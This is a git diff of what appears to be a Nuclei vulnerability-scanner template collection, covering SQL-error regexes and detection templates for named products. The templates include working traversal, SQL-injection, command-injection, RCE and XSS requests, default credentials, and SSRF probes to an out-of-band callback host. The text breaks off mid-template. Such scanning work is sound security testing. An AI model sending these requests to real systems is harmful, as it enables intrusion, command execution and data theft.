"System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/nuclei-templates/Other/generic-linux-lfi-7588.yaml b/nuclei-templates/Other/0xlfi2.yaml similarity index 100% rename from nuclei-templates/Other/generic-linux-lfi-7588.yaml rename to nuclei-templates/Other/0xlfi2.yaml diff --git a/nuclei-templates/Other/0xlfi3.yaml b/nuclei-templates/Other/0xlfi3.yaml new file mode 100644 index 0000000000..f98d846a4b --- /dev/null +++ b/nuclei-templates/Other/0xlfi3.yaml @@ -0,0 +1,24 @@ +id: thinkcmf-lfi +info: + name: ThinkCMF LFI + author: pikpikcu + severity: high + reference: https://www.freebuf.com/vuls/217586.html + tags: thinkcmf,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/?a=display&templateFile=README.md" + - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + - "\\[(font|extension|file)s\\]" + - 'ThinkCMF' + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/1424627148.yaml b/nuclei-templates/Other/1424627148.yaml deleted file mode 100644 index 94670ac885..0000000000 --- a/nuclei-templates/Other/1424627148.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: ibm-hmc -info: - name: ibm-hmc - author: cn-kali-team - tags: detect,tech,ibm-hmc - severity: info - metadata: - product: ibm-hmc - vendor: 00_unknown - verified: false -http: -- method: GET - path: - - '{{BaseURL}}/' - matchers: - - type: word - words: - - - case-insensitive: true diff --git a/nuclei-templates/CVE-2021/CVE-2021-20837.yaml b/nuclei-templates/Other/2021-20837.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-20837.yaml rename to nuclei-templates/Other/2021-20837.yaml diff --git a/nuclei-templates/Other/3733514078.yaml b/nuclei-templates/Other/3733514078.yaml deleted file mode 100644 index 9ab649972f..0000000000 --- a/nuclei-templates/Other/3733514078.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: munin -info: - name: munin - author: cn-kali-team - tags: detect,tech,munin - severity: info - metadata: - product: munin - vendor: 00_unknown - verified: false -http: -- method: GET - path: - - '{{BaseURL}}/' - matchers: - - type: word - words: - - auto-generated by munin - - munin-month.html - case-insensitive: true diff --git a/nuclei-templates/Other/3g-wireless-gateway-5.yaml b/nuclei-templates/Other/3g-wireless-gateway-5.yaml deleted file mode 100644 index e53f7f09f4..0000000000 --- a/nuclei-templates/Other/3g-wireless-gateway-5.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: 3g-wireless-gateway -info: - name: 3G wireless gateway - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7050 - tags: panel,router - -requests: - - method: GET - path: - - "{{BaseURL}}/htmlcode/html/indexdefault.asp" - - matchers-condition: and - matchers: - - type: word - words: - - "g_i3gState" - - "g_sysinfo_sim_state" - - "g_iUID" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/3g-wireless-gateway-6.yaml b/nuclei-templates/Other/3g-wireless-gateway-6.yaml new file mode 100644 index 0000000000..98218b8ff3 --- /dev/null +++ b/nuclei-templates/Other/3g-wireless-gateway-6.yaml @@ -0,0 +1,35 @@ +id: 3g-wireless-gateway + +info: + name: 3G Wireless Gateway Detection + author: pussycat0x + severity: info + description: A 3G wireless gateway was detected. + reference: + - https://www.exploit-db.com/ghdb/7050 + tags: panel,router + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/htmlcode/html/indexdefault.asp" + + matchers-condition: and + matchers: + - type: word + words: + - "g_i3gState" + - "g_sysinfo_sim_state" + - "g_iUID" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/14 diff --git a/nuclei-templates/Other/3gmeeting-fileread.yaml b/nuclei-templates/Other/3gmeeting-fileRead.yaml similarity index 100% rename from nuclei-templates/Other/3gmeeting-fileread.yaml rename to nuclei-templates/Other/3gmeeting-fileRead.yaml diff --git a/nuclei-templates/Other/74cms-sqli-9.yaml b/nuclei-templates/Other/74cms-sqli-9.yaml deleted file mode 100644 index 904b2a3a57..0000000000 --- a/nuclei-templates/Other/74cms-sqli-9.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: 74cms-sqli -info: - author: princechaddha - name: 74cms Sql Injection - severity: high - tags: 74cms,sqli - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a' - - matchers: - - type: word - words: - - "e807f1fcf82d132f9bb018ca6738a19f" - part: body diff --git a/nuclei-templates/Other/74cms-sqli.yaml b/nuclei-templates/Other/74cms-sqli.yaml new file mode 100644 index 0000000000..87cb527db1 --- /dev/null +++ b/nuclei-templates/Other/74cms-sqli.yaml @@ -0,0 +1,26 @@ +id: 74cms-sqli +info: + name: 74cms Sql Injection + author: princechaddha + severity: critical + description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php. + reference: + - https://github.com/possib1e/vuln/issues/3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 + tags: 74cms,sqli +variables: + num: "999999999" +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5({{num}}))) -- a' + matchers: + - type: word + words: + - '{{md5({{num}})}}' + part: body + +# Enhanced by ritikchaddha on 2022/05/05 diff --git a/nuclei-templates/Other/823623832.yaml b/nuclei-templates/Other/823623832.yaml deleted file mode 100644 index 0c6a7aa885..0000000000 --- a/nuclei-templates/Other/823623832.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: vnc -info: - name: vnc - author: cn-kali-team - tags: detect,tech,vnc - severity: info - metadata: - product: vnc - vendor: 00_unknown - verified: false -http: -- method: GET - path: - - '{{BaseURL}}/' - matchers: - - type: word - words: - - =7 && duration <=16" diff --git a/nuclei-templates/Other/CNVD-2019-06255.yaml b/nuclei-templates/Other/CNVD-2019-06255.yaml deleted file mode 100644 index 25c1b895a2..0000000000 --- a/nuclei-templates/Other/CNVD-2019-06255.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CNVD-2019-06255 -info: - name: CatfishCMS RCE - author: Lark-Lab - severity: critical - description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter. - remediation: Upgrade to CatfishCMS version 4.8.54 or later. - reference: - - https://its401.com/article/yun2diao/91344725 - - https://github.com/xwlrbh/Catfish/issues/4 - tags: rce,cnvd,catfishcms,cnvd2019 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 -requests: - - method: GET - path: - - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'OS' - - 'PATH' - - 'SHELL' - - 'USER' - condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/Other/CNVD-2019-17294.yaml b/nuclei-templates/Other/CNVD-2019-17294.yaml new file mode 100644 index 0000000000..8d34ef6e4e --- /dev/null +++ b/nuclei-templates/Other/CNVD-2019-17294.yaml @@ -0,0 +1,32 @@ +id: CNVD-2019-17294 +info: + name: Qizhi Fortress Command Execution + author: daffainfo + severity: critical + reference: https://www.cnblogs.com/StudyCat/p/11197986.html + tags: qizhi,rce,cnvd,cnvd2019 +requests: + - raw: + - | + POST /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-Requested-With: XMLHttpRequest + + page=1&rp=30&sortname=stamp1&sortorder=desc&query=&qtype= + matchers-condition: and + matchers: + - type: word + part: body + words: + - '--service' + - '"cmdline"' + - '"rows"' + condition: and + - type: word + part: header + words: + - 'text/x-json' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/CNVD-2020-46552.yaml b/nuclei-templates/Other/CNVD-2020-46552.yaml new file mode 100644 index 0000000000..f3fb8535c0 --- /dev/null +++ b/nuclei-templates/Other/CNVD-2020-46552.yaml @@ -0,0 +1,29 @@ +id: CNVD-2020-46552 +info: + name: Sangfor EDR - Remote Code Execution + author: ritikchaddha + severity: critical + description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host. + reference: + - https://www.modb.pro/db/144475 + - https://blog.csdn.net/bigblue00/article/details/108434009 + - https://cn-sec.com/archives/721509.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: cnvd,cnvd2020,sangfor,rce +requests: + - method: GET + path: + - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" + matchers: + - type: dsl + dsl: + - 'contains(body, "$show_input = function($info)")' + - 'contains(body, "$strip_slashes($host)")' + - 'contains(body, "Log Helper")' + - 'status_code == 200' + condition: and + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/Other/CNVD-2020-56167.yaml b/nuclei-templates/Other/CNVD-2020-56167.yaml new file mode 100644 index 0000000000..1fe06f6c1c --- /dev/null +++ b/nuclei-templates/Other/CNVD-2020-56167.yaml @@ -0,0 +1,30 @@ +id: CNVD-2020-56167 + +info: + name: Ruijie Smartweb Default Password + author: pikpikcu + severity: low + reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 + tags: ruijie,default-login,cnvd + +requests: + - method: POST + path: + - "{{BaseURL}}/WEB_VMS/LEVEL15/" + headers: + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. + + matchers-condition: and + matchers: + + - type: word + words: + - "Level was: LEVEL15" + - "/WEB_VMS/LEVEL15/" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/CNVD-2020-67113.yaml b/nuclei-templates/Other/CNVD-2020-67113.yaml new file mode 100644 index 0000000000..7be7d95130 --- /dev/null +++ b/nuclei-templates/Other/CNVD-2020-67113.yaml @@ -0,0 +1,38 @@ +id: CNVD-2020-67113 +info: + name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113) + author: ritikchaddha + severity: high + description: Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE Exists Unauthorized Access Vulnerability + reference: + - https://vul.wangan.com/a/CNVD-2020-67113 + metadata: + shodan-query: http.title:"H5S CONSOLE" + tags: h5s,unauth,h5sconsole,cnvd,cnvd2020 +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/GetSrc" + - "{{BaseURL}}/api/v1/GetDevice" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'strUser' + - 'strPasswd' + condition: and + - type: word + part: body + words: + - 'H5_AUTO' + - 'H5_DEV' + condition: or + - type: word + part: header + words: + - "application/json" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/cnvd-2021-09650-1081.yaml b/nuclei-templates/Other/CNVD-2021-09650.yaml similarity index 100% rename from nuclei-templates/Other/cnvd-2021-09650-1081.yaml rename to nuclei-templates/Other/CNVD-2021-09650.yaml diff --git a/nuclei-templates/Other/CNVD-2021-17369.yaml b/nuclei-templates/Other/CNVD-2021-17369.yaml deleted file mode 100644 index bf303ebab1..0000000000 --- a/nuclei-templates/Other/CNVD-2021-17369.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: CNVD-2021-17369 -info: - name: Ruijie Smartweb Management System Password Information Disclosure - author: pikpikcu - severity: medium - reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 - tags: ruijie,disclosure,cnvd -requests: - - method: GET - path: - - "{{BaseURL}}/web/xml/webuser-auth.xml" - headers: - Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest - matchers-condition: and - matchers: - - type: word - words: - - "" - - "" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/CNVD-2021-49104.yaml b/nuclei-templates/Other/CNVD-2021-49104.yaml index 1d2627bca2..52de7704f6 100644 --- a/nuclei-templates/Other/CNVD-2021-49104.yaml +++ b/nuclei-templates/Other/CNVD-2021-49104.yaml @@ -1,18 +1,10 @@ id: CNVD-2021-49104 info: name: Pan Micro E-office File Uploads - description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker. - remediation: Pan Wei has released an update to resolve this vulnerability. author: pikpikcu severity: critical - reference: - - https://chowdera.com/2021/12/202112200602130067.html - - http://v10.e-office.cn + reference: https://chowdera.com/2021/12/202112200602130067.html tags: pan,micro,cnvd,cnvd2021 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L - cvss-score: 9.9 - cwe-id: CWE-434 requests: - raw: - | @@ -39,5 +31,3 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/Other/CNVD-2022-03672.yaml b/nuclei-templates/Other/CNVD-2022-03672.yaml deleted file mode 100644 index b96b1bebfe..0000000000 --- a/nuclei-templates/Other/CNVD-2022-03672.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CNVD-2022-03672 -info: - name: Sunflower Simple and Personal - Remote Code Execution - author: daffainfo - severity: critical - description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. - reference: - - https://www.1024sou.com/article/741374.html - - https://copyfuture.com/blogs-details/202202192249158884 - - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: cnvd,cnvd2020,sunflower,rce -requests: - - raw: - - | - POST /cgi-bin/rpc HTTP/1.1 - Host: {{Hostname}} - - action=verify-haras - - | - GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 - Host: {{Hostname}} - Cookie: CID={{cid}} - extractors: - - type: regex - name: cid - internal: true - group: 1 - regex: - - '"verify_string":"(.*)"' - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1==200" - - "status_code_2==200" - - "contains(body_1, 'verify_string')" - - "contains(body_2, 'Windows IP')" - condition: and - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2023/CVE-2023-51467.yaml b/nuclei-templates/Other/CVE_2023_51467.yaml similarity index 100% rename from nuclei-templates/CVE-2023/CVE-2023-51467.yaml rename to nuclei-templates/Other/CVE_2023_51467.yaml diff --git a/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml b/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml index 5aac16e873..2868f2cd46 100644 --- a/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml +++ b/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml @@ -1,4 +1,5 @@ id: siteminder-dom-based-xss + info: name: SiteMinder DOM BASED XSS author: Clark @@ -6,19 +7,23 @@ info: description: SiteMinder DOM Based XSS. tags: dom,xss reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html + requests: - method: GET path: - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'confirm(document.domain)' + - type: word words: - 'text/html' diff --git a/nuclei-templates/Other/dse855.yaml b/nuclei-templates/Other/DSE855.yaml similarity index 100% rename from nuclei-templates/Other/dse855.yaml rename to nuclei-templates/Other/DSE855.yaml diff --git a/nuclei-templates/Other/Dahua_getFaceCapture_Sqli.yaml b/nuclei-templates/Other/Dahua_getFaceCapture_Sqli.yaml new file mode 100644 index 0000000000..78d89c1465 --- /dev/null +++ b/nuclei-templates/Other/Dahua_getFaceCapture_Sqli.yaml @@ -0,0 +1,29 @@ +id: Dahua + +info: + name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high + description: | + There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + metadata: + fofa-query: app="dahua-智慧园区综合管理平台" + hunter-query: web.body="/WPMS/asset/lib/json2.js" + + + +http: + - method: GET + path: + - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "c4ca" + + - type: status + status: + - 500 diff --git a/nuclei-templates/Other/Dahua_getUserInfoByUserName.yaml b/nuclei-templates/Other/Dahua_getUserInfoByUserName.yaml deleted file mode 100644 index 77936cf562..0000000000 --- a/nuclei-templates/Other/Dahua_getUserInfoByUserName.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: Dahua - -info: - name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: medium - description: | - Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account - metadata: - fofa-query: app="dahua-智慧园区综合管理平台" - hunter-query: web.body="/WPMS/asset/lib/json2.js" - -http: - - method: GET - path: - - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "loginName" - - "loginPass" - - - type: status - status: - - 200 - -# 获取后访问地址 -# /admin/login_login.action diff --git a/nuclei-templates/Other/Facebook-client-id.yaml b/nuclei-templates/Other/Facebook-client-id.yaml new file mode 100644 index 0000000000..038fdbd646 --- /dev/null +++ b/nuclei-templates/Other/Facebook-client-id.yaml @@ -0,0 +1,16 @@ +id: facebook-client-id + +info: + name: Facebook Client ID + author: gaurang + severity: info + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]" \ No newline at end of file diff --git a/nuclei-templates/Other/facebook-secret-11849.yaml b/nuclei-templates/Other/Facebook-secret.yaml similarity index 100% rename from nuclei-templates/Other/facebook-secret-11849.yaml rename to nuclei-templates/Other/Facebook-secret.yaml diff --git a/nuclei-templates/Other/GLPIDirectoryListing.yaml b/nuclei-templates/Other/GLPIDirectoryListing.yaml new file mode 100644 index 0000000000..8101849542 --- /dev/null +++ b/nuclei-templates/Other/GLPIDirectoryListing.yaml @@ -0,0 +1,47 @@ +id: GLPI_Exposed_Data +info: + author: RedTeamBrasil + description: "By default many system admins allow directory listening" + name: "Exposed data in GLPI" + reference: "N/A" + severity: high + tags: "glpi,misconfiguration,data,exposed" +requests: + - method: GET + payloads: + expose_data: + - /glpi/files/_sessions/ + - /glpi/files/_sesasdfasdsions/ + - /glpi/files/_dumps/ + - /files/_tmp/ + - /files/_uploads/ + - /files/_log/ + - /glpi/_dumps/ + - /glpi/_pictures/ + - /glpi/_sessions/ + - /glpi/_tmp/ + - /glpi/_uploads/ + - /glpi/files/_dumps/ + - /glpi/files/_pictures/ + - /glpi/files/_sessions/ + - /glpi/files/_tmp/ + - /glpi/files/_uploads/ + - /glpi/files/_log/ + - /glpi/config/ + - /files/ZIP/ + - /glpi/files/ZIP/ + raw: + - | + GET {{expose_data}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + attack: batteringram + threads: 10 + matchers: + - part: body + type: word + words: + - "Index of" diff --git a/nuclei-templates/Other/gt-ac2900-login.yaml b/nuclei-templates/Other/GT-AC2900-login.yaml similarity index 100% rename from nuclei-templates/Other/gt-ac2900-login.yaml rename to nuclei-templates/Other/GT-AC2900-login.yaml diff --git a/nuclei-templates/Other/geovision-rce.yaml b/nuclei-templates/Other/Geovision-rce.yaml similarity index 100% rename from nuclei-templates/Other/geovision-rce.yaml rename to nuclei-templates/Other/Geovision-rce.yaml diff --git a/nuclei-templates/Other/getsimple-leakage.yaml b/nuclei-templates/Other/GetSimple-leakage.yaml similarity index 100% rename from nuclei-templates/Other/getsimple-leakage.yaml rename to nuclei-templates/Other/GetSimple-leakage.yaml diff --git a/nuclei-templates/Other/Header-Injection.yaml b/nuclei-templates/Other/Header-Injection.yaml deleted file mode 100644 index decaacb4d3..0000000000 --- a/nuclei-templates/Other/Header-Injection.yaml +++ /dev/null @@ -1,185 +0,0 @@ -id: header-injection -info: - name: Header SSRF Injection - author: nullrabbit - severity: high - description: Fuzzing headers for OOB SSRF - tags: fuzz,ssrf -requests: - - payloads: - header: helpers/payloads/proxy-headers.txt - - raw: - - | - GET / HTTP/1.1 - Host: {{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Host: {{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET / HTTP/1.1 - Host: {{Hostname}}@{{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - GET / HTTP/1.1 - Host: {{Hostname}}@{{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET / HTTP/1.1 - Host: {{BaseURL}}@{{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET @{{interactsh-url}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET / HTTP/1.1 - Host: {{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-Host: {{interactsh-url}} - Connection: close - - | - GET /{{interactsh-url}}/{{interactsh-url}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET {{BaseURL}} HTTP/1.1 - Host: {{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-Host: {{interactsh-url}} - Via: {{interactsh-url}} - Connection: close - - | - GET / HTTP/1.1 - Host: {{BaseURL}}/?{{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-Host: {{interactsh-url}} - Via: {{interactsh-url}} - Connection: close - - | - GET / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) 